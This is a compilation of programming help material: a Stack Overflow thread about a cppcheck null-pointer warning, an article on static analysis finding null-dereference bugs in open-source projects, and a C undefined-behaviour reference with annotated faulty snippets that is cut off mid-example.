Null pointer dereference error

I am just using cppcheck. The code is working properly; only cppcheck gives this error.

void WorkerThread(WorkBuffer* m_buffer)
{
    std::cout << "Thread : " << m_buffer->m_id << ".....Starting" << std::endl;

    if (NULL == m_buffer)
        std::cout << "Thread : " << m_buffer->m_id << "......work buffer is null" << std::endl;


    while(!shut_down_flag)
    {
        int k = 0;
        //Sleep(1);
        SleepSystemUsec(100000);
        std::cout << "Thread : " << m_buffer->m_id << "....in while loop" << std::endl;
    } // of while(!shut_down_flag)

    std::cout << "Thread : " << m_buffer->m_id << ".....Request from main thread so ending working thread ...." << std::endl;
};

error : : Possible null pointer dereference: m_buffer — otherwise it is redundant to check it against null.

asked Apr 20, 2015 at 14:20 by user3521035

if (NULL == m_buffer) 

makes sure m_buffer is NULL, and then you dereference it with

std::cout << "Thread : " << m_buffer->m_id << "......work buffer is null" << std::endl;
                            ^^^^^^^^^^^^^^^

this, which is only legal if m_buffer is not NULL (more precisely, only if it points to a correctly constructed WorkBuffer).

If NULL is a possible input for your function, you need to check for it before the very first dereference and then either make it point to something valid or leave the function without dereferencing.
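A minimal sketch of the "check first, then leave" pattern described above. It is written in C rather than the question's C++ so that it matches the C examples later on this page; the one-field WorkBuffer layout and the function name worker_start are assumptions made for illustration, not the asker's real code.

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical minimal layout; the real WorkBuffer is not shown in the question. */
typedef struct {
    int m_id;
} WorkBuffer;

/* Returns 0 on success, -1 if no buffer was supplied. */
static int worker_start(const WorkBuffer *m_buffer)
{
    /* Test the pointer before the very first dereference. */
    if (m_buffer == NULL) {
        /* Do not touch m_buffer->m_id here: there is no object to read. */
        fputs("Thread : work buffer is null\n", stderr);
        return -1;
    }

    /* From here on m_buffer is known to be non-null. */
    printf("Thread : %d.....Starting\n", m_buffer->m_id);
    return 0;
}
```

With this shape, every later use of m_buffer in the function is covered by the single check at the top, which is also what removes the cppcheck message.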

answered Apr 20, 2015 at 14:24 by Baum mit Augen

Not only is your condition backwards:

if m_buffer is NULL:
  do things that dereference m_buffer
(huh?!)

but you have no checks on any of the other output statements.

answered Apr 20, 2015 at 14:58 by Lightness Races in Orbit

Detecting the "null pointer dereference" defect in code

With this article we begin a series of publications on detecting bugs and vulnerabilities in open-source projects with the static code analyzer AppChecker. The series will cover the most common defects in program code that can lead to serious vulnerabilities. Today we look at the "null pointer dereference" defect.

Null pointer dereference (CWE-476) is a defect in which a program accesses memory through an invalid (null) pointer. Such an access results in undefined behavior, which in most cases ends with the program crashing.

Below is an example of an access through a null pointer. In this case the program will most likely run without reporting any errors.

#include <iostream>
class A {
public:
    void bar() {
        std::cout << "Test!\n";
    }
};

int main() {
    A* a = 0;
    a->bar();
    return 0;
}

Now consider an example in which the program crashes. It is very similar to the previous one, with one small difference.

#include <iostream>
class A {
    int x;
public:
    void bar() {
        std::cout << x << "Test!\n";
    }
};

int main() {
    A* a = 0;
    a->bar();
    return 0;
}

Why does the program run normally in one case and not in the other? In the second case the called method accesses a field of the null object, which reads from an unpredictable region of the address space. In the first case the method does not access any fields of the object, so the program will most likely finish normally (although both calls are formally undefined behavior).

Consider the following C++ code fragment:

if( !pColl )
   pColl->SetNextTxtFmtColl( *pDoc->GetTxtCollFromPool( nNxt ));

It is easy to see that if pColl == NULL, the body of this conditional statement executes. However, the body dereferences pColl, which will probably crash the program.

Such defects usually arise from developer inattention. Blocks of this kind are most often used for error handling. Various static analysis methods can detect such defects, for example signature analysis or symbolic execution. In the first case, one writes a signature that searches the abstract syntax tree (AST) for a "conditional statement" node whose condition contains an expression such as !a, a == 0, and so on, and whose body accesses that object or dereferences that pointer. False positives must then be filtered out; for example, the variable may be assigned a value before it is dereferenced:

if(!a) {
  a = new A();
  a->bar();
}

The expression in the condition may also be non-trivial.

In the second case, the analyzer tracks which values variables can hold as it works through the code. After processing the condition if (!a), the analyzer knows that a is null inside the body of the conditional statement. Accordingly, dereferencing it there can be reported as an error.

The code fragment above is taken from the popular free office suite Apache OpenOffice, version 4.1.2. The defect was found with the static code analyzer AppChecker. The developers were notified of the defect and released a patch that fixed it.

Consider a similar defect found in Oracle MySQL Server 5.7.10:

bool sp_check_name(LEX_STRING *ident)
{
  if (!ident || !ident->str || !ident->str[0] ||
      ident->str[ident->length-1] == ' ')
  {
    my_error(ER_SP_WRONG_NAME, MYF(0), ident->str);
    return true;
  }
..
}

In this example, if ident is 0, the condition is true and the following line executes:

my_error(ER_SP_WRONG_NAME, MYF(0), ident->str);

which dereferences a null pointer. Apparently the developer, while writing this error-catching fragment, simply did not consider that this situation could arise. The correct solution would be a separate error handler for the case ident == 0.
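One way the separate handler could look, as a self-contained C sketch. The NameString type and report_wrong_name function are hypothetical stand-ins for MySQL's LEX_STRING and my_error; this is not the patch that was actually applied to MySQL.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical stand-in for LEX_STRING. */
typedef struct {
    char  *str;
    size_t length;
} NameString;

/* Hypothetical stand-in for my_error(ER_SP_WRONG_NAME, ...). */
static void report_wrong_name(const char *name)
{
    fprintf(stderr, "Incorrect routine name '%s'\n", name);
}

/* Returns true if the name is invalid, mirroring sp_check_name. */
static bool check_name(const NameString *ident)
{
    /* Separate branch: there is no string to print, so nothing is dereferenced. */
    if (ident == NULL || ident->str == NULL) {
        report_wrong_name("");
        return true;
    }

    /* ident and ident->str are known to be valid from here on. */
    if (ident->length == 0 || ident->str[0] == '\0' ||
        ident->str[ident->length - 1] == ' ') {
        report_wrong_name(ident->str);
        return true;
    }
    return false;
}
```

Splitting the condition keeps the error message for the ordinary "bad name" case while making the null case safe to report.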

As one might guess, null pointer dereference is a defect that does not depend on the programming language. The previous two examples showed C++ code, but the AppChecker static analyzer can also find similar problems in Java and PHP projects. Here are corresponding examples.

Consider a code fragment from BIM Server, a system for managing and centralizing construction information, version bimserver 1.4.0-FINAL-2015-11-04, written in Java:

if (requestUri.equals("") || requestUri.equals("/") || requestUri == null) {
     requestUri = "/index.html";
}

In this example, requestUri is used first and only afterwards checked for null. To avoid the defect, it would have been enough to swap the order of these operations.

Now consider a code fragment from phabricator, a popular collection of web applications written in PHP:

if (!$device) {
    throw new Exception(
      pht(
        'Invalid device name ("%s"). There is no device with this name.',
        $device->getName()));
}

In this case the condition holds only when $device is NULL, yet $device->getName() is then called, which causes a fatal error.

Such defects can go unnoticed for a very long time, but at some point the condition will be met and the program will crash. Despite the simplicity and seeming banality of such defects, they occur quite often, in both open-source and commercial projects.

Update:

Link to the free version of AppChecker: https://file.cnpo.ru/index.php/s/o1cLkNrUX4plHMV

Introduction

In C, some expressions yield undefined behavior. The standard explicitly chooses to not define how a compiler should behave if it encounters such an expression. As a result, a compiler is free to do whatever it sees fit and may produce useful results, unexpected results, or even crash.

Code that invokes UB may work as intended on a specific system with a specific compiler, but will likely not work on another system, or with a different compiler, compiler version or compiler settings.

What is Undefined Behavior (UB)?

Undefined behavior is a term used in the C standard. The C11 standard (ISO/IEC 9899:2011) defines the term undefined behavior as

behavior, upon use of a nonportable or erroneous program construct or of erroneous data, for which this International Standard imposes no requirements

What happens if there is UB in my code?

According to the standard, undefined behavior can have results such as these:

NOTE Possible undefined behavior ranges from ignoring the situation
completely with unpredictable results, to behaving during translation
or program execution in a documented manner characteristic of the
environment (with or without the issuance of a diagnostic message), to
terminating a translation or execution (with the issuance of a
diagnostic message).

The following quote is often used to describe (less formally though) results happening from undefined behavior:

“When the compiler encounters [a given undefined construct] it is
legal for it to make demons fly out of your nose” (the implication is
that the compiler may choose any arbitrarily bizarre way to interpret
the code without violating the ANSI C standard)

Why does UB exist?

If it’s so bad, why didn’t they just define it or make it implementation-defined?

Undefined behavior allows more opportunities for optimization. The compiler can justifiably assume that no code contains undefined behaviour, which lets it avoid run-time checks and perform optimizations whose validity would otherwise be costly or impossible to prove.

Why is UB hard to track down?

There are at least two reasons why undefined behavior creates bugs that are difficult to detect:

  • The compiler is not required to — and generally can’t reliably — warn you about undefined behavior. In fact requiring it to do so would go directly against the reason for the existence of undefined behaviour.
  • The unpredictable results might not start unfolding at the exact point of the operation where the construct whose behavior is undefined occurs. Undefined behaviour taints the whole execution and its effects may happen at any time: during, after, or even before the undefined construct.

Consider null-pointer dereference: the compiler is not required to diagnose null-pointer dereference, and even could not, as at run-time any pointer passed into a function, or in a global variable might be null. And when the null-pointer dereference occurs, the standard does not mandate that the program needs to crash. Rather, the program might crash earlier, later, or not crash at all; it could even behave as if the null pointer pointed to a valid object, and behave completely normally, only to crash under other circumstances.

In this respect C differs from managed languages such as Java or C#, where the behavior of a null-pointer dereference is defined: an exception is thrown at the point of the dereference (NullPointerException in Java, NullReferenceException in C#). Programmers coming from Java or C# might therefore incorrectly believe that a C program must crash in such a case, with or without a diagnostic message.

Additional information

There are several such situations that should be clearly distinguished:

  • Explicitly undefined behavior, that is where the C standard explicitly tells you that you are off limits.
  • Implicitly undefined behavior, where the standard simply contains no text that defines a behavior for the situation your program is in.

Also keep in mind that in many places the behavior of certain constructs is deliberately left undefined by the C standard to leave room for compiler and library implementors to come up with their own definitions. Good examples are signals and signal handlers, where extensions to C, such as the POSIX operating system standard, define much more elaborate rules. In such cases you just have to check the documentation of your platform; the C standard can’t tell you anything.

Also note that if undefined behavior occurs in a program, it is not just the point where it occurred that is problematic; rather, the entire program becomes meaningless.

Because of such concerns it is important (especially since compilers don’t always warn us about UB) for anyone programming in C to be at least familiar with the kinds of things that trigger undefined behavior.

It should be noted there are some tools (e.g. static analysis tools such as PC-Lint) which aid in detecting undefined behavior, but again, they can’t detect all occurrences of undefined behavior.

Dereferencing a null pointer

This is an example of dereferencing a NULL pointer, causing undefined behavior.

int * pointer = NULL;
int value = *pointer; /* Dereferencing happens here */

A NULL pointer is guaranteed by the C standard to compare unequal to any pointer to a valid object, and dereferencing it invokes undefined behavior.

Modifying any object more than once between two sequence points

int i = 42;
i = i++; /* Assignment changes variable, post-increment as well */
int a = i++ + i--;

Code like this often leads to speculation about the "resulting value" of i. Rather than specifying an outcome, however, the C standards specify that evaluating such an expression produces undefined behavior. Prior to C2011, the standard formalized these rules in terms of so-called sequence points:

Between the previous and next sequence point a scalar object shall have its stored value modified at most once by the evaluation of an expression. Furthermore, the prior value shall be read only to determine the value to be stored.

(C99 standard, section 6.5, paragraph 2)

That scheme proved to be a little too coarse, leaving some expressions with undefined behavior under C99 that plausibly should be well defined. C2011 retains sequence points, but introduces a more nuanced approach to this area based on sequencing and a relationship it calls "sequenced before":

If a side effect on a scalar object is unsequenced relative to either a different side effect on the same scalar object or a value computation using the value of the same scalar object, the behavior is undefined. If there are multiple allowable orderings of the subexpressions of an expression, the behavior is undefined if such an unsequenced side effect occurs in any of the orderings.

(C2011 standard, section 6.5, paragraph 2)

The full details of the "sequenced before" relation are too long to describe here, but they supplement sequence points rather than supplanting them, so they have the effect of defining behavior for some evaluations whose behavior previously was undefined. In particular, if there is a sequence point between two evaluations, then the one before the sequence point is "sequenced before" the one after.

The following example has well-defined behaviour:

int i = 42;
i = (i++, i+42); /* The comma-operator creates a sequence point */

The following example has undefined behaviour:

int i = 42;
printf("%d %d\n", i++, i++); /* commas as separator of function arguments are not comma-operators */

As with any form of undefined behavior, observing the actual behavior of evaluating expressions that violate the sequencing rules is not informative, except in a retrospective sense. The language standard provides no basis for expecting such observations to be predictive even of the future behavior of the same program.
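A well-defined alternative to the printf call above is to give each modification its own full expression, so that a sequence point separates them. The sketch below assumes the intent was to print two successive values of the counter; the function name is made up for illustration.

```c
#include <stdio.h>

/* Prints two successive values of *i, incrementing it once per statement. */
static void print_two_increments(int *i)
{
    int first  = (*i)++;  /* the end of this full expression is a sequence point */
    int second = (*i)++;  /* sequenced after the previous increment */

    /* The arguments are now plain values, so their evaluation order is irrelevant. */
    printf("%d %d\n", first, second);
}
```

Called with a counter holding 42, this prints "42 43" and leaves the counter at 44, on every conforming implementation.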

Missing return statement in value returning function

int foo(void) {
  /* do stuff */
  /* no return here */
}

int main(void) {
  /* Trying to use the (not) returned value causes UB */
  int value = foo();
  return 0;
}

When a function is declared to return a value, it has to do so on every possible code path through it. Undefined behavior occurs as soon as the caller (which is expecting a return value) tries to use the return value (1).

Note that the undefined behaviour happens only if the caller attempts to use/access the value from the function. For example,

int foo(void) {
  /* do stuff */
  /* no return here */
}

int main(void) {
  /* The value (not) returned from foo() is unused. So, this program
   * doesn't cause *undefined behaviour*. */
  foo();
  return 0;
}

C99

The main() function is an exception to this rule in that it is possible for it to be terminated without a return statement because an assumed return value of 0 will automatically be used in this case (2).


1 (ISO/IEC 9899:201x, 6.9.1/12)

If the } that terminates a function is reached, and the value of the function call is used by the caller, the behavior is undefined.

2 (ISO/IEC 9899:201x, 5.1.2.2.3/1)

reaching the } that terminates the main function returns a value of 0.

Signed integer overflow

Per paragraph 6.5/5 of both C99 and C11, evaluation of an expression produces undefined behavior if the result is not a representable value of the expression’s type. For arithmetic types, that’s called an overflow. Unsigned integer arithmetic does not overflow because paragraph 6.2.5/9 applies, causing any unsigned result that otherwise would be out of range to be reduced to an in-range value. There is no analogous provision for signed integer types, however; these can and do overflow, producing undefined behavior. For example,

#include <limits.h>      /* to get INT_MAX */

int main(void) {
    int i = INT_MAX + 1; /* Overflow happens here */
    return 0;
}

Most instances of this type of undefined behavior are more difficult to recognize or predict. Overflow can in principle arise from any addition, subtraction, or multiplication operation on signed integers (subject to the usual arithmetic conversions) where there are not effective bounds on or a relationship between the operands to prevent it. For example, this function:

int square(int x) {
    return x * x;  /* overflows for some values of x */
}

is reasonable, and it does the right thing for small enough argument values, but its behavior is undefined for larger argument values. You cannot judge from the function alone whether programs that call it exhibit undefined behavior as a result. It depends on what arguments they pass to it.
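If the caller cannot guarantee a small enough argument, the check has to happen before the multiplication, because the overflow itself is the undefined operation. The following is one possible sketch; the name checked_square and its out-parameter interface are assumptions for illustration.

```c
#include <limits.h>
#include <stdbool.h>

/* Stores x * x in *out and returns true only if the result fits in an int. */
static bool checked_square(int x, int *out)
{
    /* For x > 0: x * x <= INT_MAX exactly when x <= INT_MAX / x. */
    if (x > 0 && x > INT_MAX / x)
        return false;

    /* For x < 0: INT_MAX / x is negative (or 0 for INT_MIN), and the
     * product fits exactly when x >= INT_MAX / x. No abs() is used,
     * because abs(INT_MIN) would itself overflow. */
    if (x < 0 && x < INT_MAX / x)
        return false;

    *out = x * x;  /* cannot overflow at this point */
    return true;
}
```

The divisions used for the test are always well defined here: the divisor is never zero, and INT_MAX divided by any nonzero int is representable.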

On the other hand, consider this trivial example of overflow-safe signed integer arithmetic:

int zero(int x) {
    return x - x;  /* Cannot overflow */
}

The relationship between the operands of the subtraction operator ensures that the subtraction never overflows. Or consider this somewhat more practical example:

int sizeDelta(FILE *f1, FILE *f2) {
    int count1 = 0;
    int count2 = 0;
    while (fgetc(f1) != EOF) count1++;  /* might overflow */
    while (fgetc(f2) != EOF) count2++;  /* might overflow */

    return count1 - count2; /* provided no UB to this point, will not overflow */
}

As long as the counters do not overflow individually, the operands of the final subtraction will both be non-negative. All differences between any two such values are representable as int.

Use of an uninitialized variable

int a; 
printf("%d", a);

The variable a is an int with automatic storage duration. The example code above is trying to print the value of an uninitialized variable (a was never initialized). Automatic variables which are not initialized have indeterminate values; accessing these can lead to undefined behavior.

Note: Variables with static or thread local storage, including global variables without the static keyword, are initialized to either zero, or their initialized value. Hence the following is legal.

static int b;
printf("%d", b);

A very common mistake is to not initialize the variables that serve as counters to 0. You add values to them, but since the initial value is garbage, you will invoke Undefined Behavior, such as in the question Compilation on terminal gives off pointer warning and strange symbols.

Example:

#include <stdio.h>

int main(void) {
    int i, counter;
    for(i = 0; i < 10; ++i)
        counter += i;
    printf("%d\n", counter);
    return 0;
}

Output:

C02QT2UBFVH6-lm:~ gsamaras$ gcc main.c -Wall -o main
main.c:6:9: warning: variable 'counter' is uninitialized when used here [-Wuninitialized]
        counter += i;
        ^~~~~~~
main.c:4:19: note: initialize the variable 'counter' to silence this warning
    int i, counter;
                  ^
                   = 0
1 warning generated.
C02QT2UBFVH6-lm:~ gsamaras$ ./main
32812
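For comparison, here is the same summation with the accumulator given a defined starting value, wrapped in a function (the name sum_below is chosen here for illustration).

```c
/* Sums the integers 0 .. n-1. The accumulator starts from a known value,
 * so every read of it is well defined. */
static int sum_below(int n)
{
    int counter = 0;  /* explicit initialization */

    for (int i = 0; i < n; ++i)
        counter += i;

    return counter;
}
```

sum_below(10) returns 45, the value the original program was presumably meant to print.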

The above rules are applicable for pointers as well. For example, the following results in undefined behavior

int main(void)
{
    int *p;
    p++; // Trying to increment an uninitialized pointer.
}

Note that the above code on its own might not produce a visible error or segmentation fault, but the behavior is already undefined at the increment; dereferencing the pointer later would be undefined as well.

Dereferencing a pointer to variable beyond its lifetime

int* foo(int bar)
{
    int baz = 6;
    baz += bar;
    return &baz; /* (&baz) copied to new memory location outside of foo. */
} /* (1) The lifetime of baz and bar end here as they have automatic storage   
   * duration (local variables), thus the returned pointer is not valid! */

int main (void)
{
    int* p;

    p = foo(5);  /* (2) this expression's behavior is undefined */
    *p = *p - 6; /* (3) Undefined behaviour here */

    return 0;
}

Some compilers helpfully point this out. For example, gcc warns with:

warning: function returns address of local variable [-Wreturn-local-addr]

and clang warns with:

warning: address of stack memory associated with local variable 'baz' returned 
[-Wreturn-stack-address]

for the above code. But compilers may not be able to help in complex code.

(1) Returning a pointer to a variable declared static is defined behaviour, as such a variable is not destroyed when the function returns.

(2) According to ISO/IEC 9899:2011 6.2.4 §2, "The value of a pointer becomes indeterminate when the object it points to reaches the end of its lifetime."

(3) Dereferencing the pointer returned by the function foo is undefined behaviour as the memory it references holds an indeterminate value.
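One common way to avoid the dangling pointer is to let the caller own the storage, so the object is still alive when the result is used. A sketch, with the hypothetical name foo_into:

```c
/* Computes the same value as foo above, but writes it into storage
 * supplied by the caller instead of returning the address of a local. */
static void foo_into(int bar, int *out)
{
    int baz = 6;
    baz += bar;
    *out = baz;  /* copies the value; no pointer to baz escapes */
}
```

A caller would declare an int, pass its address, and then use that int freely, since its lifetime is that of the caller's scope. Returning the int by value would work just as well in a case this small.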

Division by zero

int x = 0;
int y = 5 / x;  /* integer division */

or

double x = 0.0;
double y = 5.0 / x;  /* floating point division */

or

int x = 0;
int y = 5 % x;  /* modulo operation */

For the second line in each example, where the value of the second operand (x) is zero, the behaviour is undefined.

Note that most implementations of floating point math will follow a standard (e.g. IEEE 754), in which case operations like divide-by-zero will have consistent results (e.g., INFINITY) even though the C standard says the operation is undefined.
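For integer division the usual defence is to test the divisor first. The sketch below (the name checked_div is an assumption) also rejects INT_MIN / -1, whose quotient is not representable in int and is therefore undefined as well.

```c
#include <limits.h>
#include <stdbool.h>

/* Stores num / den in *out and returns true only if the division is defined. */
static bool checked_div(int num, int den, int *out)
{
    if (den == 0)
        return false;  /* division by zero */

    if (num == INT_MIN && den == -1)
        return false;  /* quotient would exceed INT_MAX */

    *out = num / den;
    return true;
}
```

The same two conditions guard the % operator, because the standard makes a % b undefined whenever a / b is not representable.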

Accessing memory beyond allocated chunk

A pointer to a piece of memory containing n elements may only be dereferenced if it lies in the range memory to memory + (n - 1), inclusive. Dereferencing a pointer outside of that range results in undefined behavior. As an example, consider the following code:

int array[3];
int *beyond_array = array + 3;
*beyond_array = 0; /* Accesses memory that has not been allocated. */

The third line accesses the 4th element in an array that is only 3 elements long, leading to undefined behavior. Similarly, the behavior of the second line in the following code fragment is also not well defined:

int array[3];
array[3] = 0;

Note that pointing past the last element of an array is not undefined behavior (beyond_array = array + 3 is well defined here), but dereferencing it is (*beyond_array is undefined behavior). This rule also holds for dynamically allocated memory (such as buffers created through malloc).

Copying overlapping memory

A wide variety of standard library functions have among their effects copying byte sequences from one memory region to another. Most of these functions have undefined behavior when the source and destination regions overlap.

For example, this …

#include <string.h> /* for memcpy() */

char str[19] = "This is an example";
memcpy(str + 7, str, 10);

… attempts to copy 10 bytes where the source and destination memory areas overlap by three bytes. To visualize:

               overlapping area
               |
               _ _
              |   |
              v   v
T h i s   i s   a n   e x a m p l e 
^             ^
|             |
|             destination
|
source

Because of the overlap, the resulting behavior is undefined.

Among the standard library functions with a limitation of this kind are memcpy(), strcpy(), strcat(), sprintf(), and sscanf(). The standard says of these and several other functions:

If copying takes place between objects that overlap, the behavior
is undefined.

The memmove() function is the principal exception to this rule. Its definition specifies that the function behaves as if the source data were first copied into a temporary buffer and then written to the destination address. There is no exception for overlapping source and destination regions, nor any need for one, so memmove() has well-defined behavior in such cases.

The distinction reflects an efficiency vs. generality tradeoff. Copying such as these functions perform usually occurs between disjoint regions of memory, and often it is possible to know at development time whether a particular instance of memory copying will be in that category. Assuming non-overlap affords comparatively more efficient implementations that do not reliably produce correct results when the assumption does not hold. Most C library functions are allowed the more efficient implementations, and memmove() fills in the gaps, serving the cases where the source and destination may or do overlap. To produce the correct effect in all cases, however, it must perform additional tests and / or employ a comparatively less efficient implementation.
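Applied to the overlapping copy shown earlier, the fix is simply to call memmove instead of memcpy. A small sketch, with a wrapper name (shift_right) invented for illustration:

```c
#include <string.h>

/* Copies the first count bytes of buf to buf + offset.
 * The source and destination may overlap, so memmove is used. */
static void shift_right(char *buf, size_t offset, size_t count)
{
    memmove(buf + offset, buf, count);
}
```

With char str[19] = "This is an example", calling shift_right(str, 7, 10) leaves str holding "This isThis is ane": the first ten bytes now appear at offset 7, exactly as if they had been staged through a temporary buffer.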

Reading an uninitialized object that is not backed by memory

C11

Reading an object will cause undefined behavior if the object (1):

  • is uninitialized
  • is defined with automatic storage duration
  • never has its address taken

The variable a in the below example satisfies all those conditions:

void Function( void )
{
    int a;
    int b = a;
} 

1 (Quoted from: ISO/IEC 9899:201X 6.3.2.1 Lvalues, arrays, and function designators 2)
If the lvalue designates an object of automatic storage duration that could have been declared with the register storage class (never had its address taken), and that object is uninitialized (not declared with an initializer and no assignment to it has been performed prior to use), the behavior is undefined.

Data race

C11

C11 introduced support for multiple threads of execution, which affords the possibility of data races. A program contains a data race if an object in it is accessed (1) by two different threads, where at least one of the accesses is non-atomic, at least one modifies the object, and program semantics fail to ensure that the two accesses cannot overlap temporally (2). Note well that actual concurrency of the accesses involved is not a condition for a data race; data races cover a broader class of issues arising from (allowed) inconsistencies in different threads’ views of memory.

Consider this example:

#include <threads.h>

int a = 0;

int Function( void* ignore )
{
    a = 1;

    return 0;
}

int main( void )
{
    thrd_t id;
    thrd_create( &id , Function , NULL );

    int b = a;

    thrd_join( id , NULL );
}

The main thread calls thrd_create to start a new thread running function Function. The second thread modifies a, and the main thread reads a. Neither of those accesses is atomic, and the two threads do nothing either individually or jointly to ensure that they do not overlap, so there is a data race.

Among the ways this program could avoid the data race are

  • the main thread could perform its read of a before starting the other thread;
  • the main thread could perform its read of a after ensuring via thrd_join that the other has terminated;
  • the threads could synchronize their accesses via a mutex, each one locking that mutex before accessing a and unlocking it afterward.

As the mutex option demonstrates, avoiding a data race does not require ensuring a specific order of operations, such as the child thread modifying a before the main thread reads it; it is sufficient (for avoiding a data race) to ensure that for a given execution, one access will happen before the other.
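The mutex option could be sketched as follows, assuming an implementation that provides the optional C11 <threads.h> header. The names a_lock, writer and read_a_concurrently are illustrative and not part of the original example.

```c
#include <stddef.h>
#include <threads.h>

static int   a = 0;
static mtx_t a_lock;  /* protects every access to a */

/* Thread function: writes a while holding the mutex. */
static int writer(void *ignore)
{
    (void)ignore;
    mtx_lock(&a_lock);
    a = 1;
    mtx_unlock(&a_lock);
    return 0;
}

/* Starts the writer, reads a under the mutex, and returns the value seen
 * (0 or 1), or -1 if the mutex or thread could not be created. */
static int read_a_concurrently(void)
{
    thrd_t id;
    int b;

    if (mtx_init(&a_lock, mtx_plain) != thrd_success)
        return -1;
    if (thrd_create(&id, writer, NULL) != thrd_success) {
        mtx_destroy(&a_lock);
        return -1;
    }

    mtx_lock(&a_lock);
    b = a;  /* ordered with respect to the write by the mutex */
    mtx_unlock(&a_lock);

    thrd_join(id, NULL);
    mtx_destroy(&a_lock);
    return b;
}
```

The value read may be either 0 or 1 depending on which thread acquires the mutex first, but in both cases one access happens before the other, so there is no data race.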


1 Modifying or reading an object.

2 (Quoted from ISO/IEC 9899:201x, section 5.1.2.4 "Multi-threaded executions and data races")
The execution of a program contains a data race if it contains two conflicting actions in different threads, at least one of which is not atomic, and neither happens before the other. Any such data race results in undefined behavior.

Read value of pointer that was freed

Even just reading the value of a pointer that was freed (i.e. without trying to dereference the pointer) is undefined behavior (UB), e.g.

char *p = malloc(5);
free(p);
if (p == NULL) /* NOTE: even without dereferencing, this may have UB */
{

}

Quoting ISO/IEC 9899:2011, section 6.2.4 §2:

[…] The value of a pointer becomes indeterminate when the object it points
to (or just past) reaches the end of its lifetime.

The use of an indeterminate value for anything, including apparently harmless comparison or arithmetic, can have undefined behavior if the value can be a trap representation for the type.

Modify string literal

In this code example, the char pointer p is initialized to the address of a string literal. Attempting to modify the string literal has undefined behavior.

char *p = "hello world";
p[0] = 'H'; // Undefined behavior

However, modifying a mutable array of char directly, or through a pointer is naturally not undefined behavior, even if its initializer is a literal string. The following is fine:

char a[] = "hello, world";
char *p = a;

a[0] = 'H';
p[7] = 'W';

That’s because the string literal is effectively copied to the array each time the array is initialized (once for variables with static duration, each time the array is created for variables with automatic or thread duration — variables with allocated duration aren’t initialized), and it is fine to modify array contents.

Freeing memory twice

Freeing memory twice is undefined behavior, e.g.

int * x = malloc(sizeof(int));
*x = 9;
free(x);
free(x);

Quote from the C99 standard (7.20.3.2, The free function):

Otherwise, if the argument does not match a pointer earlier returned
by the calloc, malloc, or realloc function, or if the space has been
deallocated by a call to free or realloc, the behavior is undefined.
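A common defensive idiom is to reset the pointer right after freeing it, relying on the fact that free does nothing when passed a null pointer. The helper below is a hypothetical sketch of that idiom:

```c
#include <stdlib.h>

/* Frees *pp and resets it to NULL, so that calling the helper again
 * on the same variable is harmless. */
static void free_and_clear(int **pp)
{
    free(*pp);   /* free(NULL) performs no action */
    *pp = NULL;  /* the stale address is no longer kept around */
}
```

This only protects the one pointer variable that is passed in; any other copies of the old address remain invalid and must not be freed or used.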

Using incorrect format specifier in printf

Using an incorrect format specifier in the first argument to printf invokes undefined behavior.
For example, the code below invokes undefined behavior:

long z = 'B';
printf("%c\n", z);

Here is another example

printf("%f\n",0);

The line above has undefined behavior: %f expects a double, but 0 is of type int.

Note that your compiler usually can help you avoid cases like these, if you turn on the proper flags during compiling (-Wformat in clang and gcc). From the last example:

warning: format specifies type 'double' but the argument has type
      'int' [-Wformat]
    printf("%f\n",0);
            ~~    ^
            %d
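Corrected versions of both calls might look like the sketch below, in which each argument's type matches its conversion specifier. The wrapper function is only there to make the fragment self-contained.

```c
#include <stdio.h>

/* Prints the two earlier examples with matching specifiers and
 * returns the total number of characters written. */
static int print_examples(void)
{
    long z = 'B';
    int written = 0;

    written += printf("%c\n", (int)z);  /* %c expects an int argument */
    written += printf("%ld\n", z);      /* %ld is the specifier for long */
    written += printf("%f\n", 0.0);     /* %f expects a double, so pass 0.0 */

    return written;
}
```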

Conversion between pointer types produces incorrectly aligned result

The following might have undefined behavior due to incorrect pointer alignment:

 char *memory_block = calloc(sizeof(uint32_t) + 1, 1);
 uint32_t *intptr = (uint32_t*)(memory_block + 1);  /* possible undefined behavior */
 uint32_t mvalue = *intptr;

The undefined behavior happens as the pointer is converted. According to C11, if a conversion between two pointer types produces a result that is incorrectly aligned (6.3.2.3), the behavior is undefined. Here a uint32_t could require an alignment of 2 or 4, for example.

calloc on the other hand is required to return a pointer that is suitably aligned for any object type; thus memory_block is properly aligned to contain a uint32_t in its initial part. Then, on a system where uint32_t has a required alignment of 2 or 4, memory_block + 1 will be an odd address and thus not properly aligned.

Observe that, per the C standard, the cast operation itself is already undefined. This is imposed because on platforms where addresses are segmented, the byte address memory_block + 1 may not even have a proper representation as an integer pointer.

Casting char * to pointers to other types without any concern to alignment requirements is sometimes incorrectly used for decoding packed structures such as file headers or network packets.

You can avoid the undefined behavior arising from misaligned pointer conversion by using memcpy:

memcpy(&mvalue, memory_block + 1, sizeof mvalue);

Here no pointer conversion to uint32_t* takes place and the bytes are copied one by one.

In our example this copy operation yields a valid value of mvalue only because:

  • We used calloc, so the bytes are properly initialized. In our case all bytes have value 0, but any other proper initialization would do.
  • uint32_t is an exact width type and has no padding bits
  • Any arbitrary bit pattern is a valid representation for any unsigned type.
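The memcpy approach can be wrapped in small helpers when decoding packed data. The names load_u32 and store_u32 below are illustrative, not standard functions, and the sketch copies bytes in host byte order without any endianness conversion.

```c
#include <stdint.h>
#include <string.h>

/* Reads a uint32_t from an address that may be misaligned.
 * No uint32_t* is ever formed, so no alignment rule is violated. */
uint32_t load_u32(const void *src)
{
    uint32_t value;
    memcpy(&value, src, sizeof value);
    return value;
}

/* Writes a uint32_t to an address that may be misaligned. */
void store_u32(void *dst, uint32_t value)
{
    memcpy(dst, &value, sizeof value);
}
```

Compilers commonly turn such fixed-size memcpy calls into plain loads and stores where the target allows it, so the helpers usually cost nothing.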

Addition or subtraction of pointer not properly bounded

The following code has undefined behavior:

char buffer[6] = "hello";
char *ptr1 = buffer - 1;  /* undefined behavior */
char *ptr2 = buffer + 5;  /* OK, pointing to the '\0' inside the array */
char *ptr3 = buffer + 6;  /* OK, pointing to just beyond */
char *ptr4 = buffer + 7;  /* undefined behavior */

According to C11, if addition or subtraction of a pointer into, or just beyond, an array object and an integer type produces a result that does not point into, or just beyond, the same array object, the behavior is undefined (6.5.6).

Additionally it is naturally undefined behavior to dereference a pointer that points to just beyond the array:

char buffer[6] = "hello";
char *ptr3 = buffer + 6;  /* OK, pointing to just beyond */
char value = *ptr3;       /* undefined behavior */
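The one-past-the-end pointer is still useful as a loop bound, as long as it is only compared and never dereferenced. A minimal sketch, with count_char as a made-up function name:

```c
#include <stddef.h>

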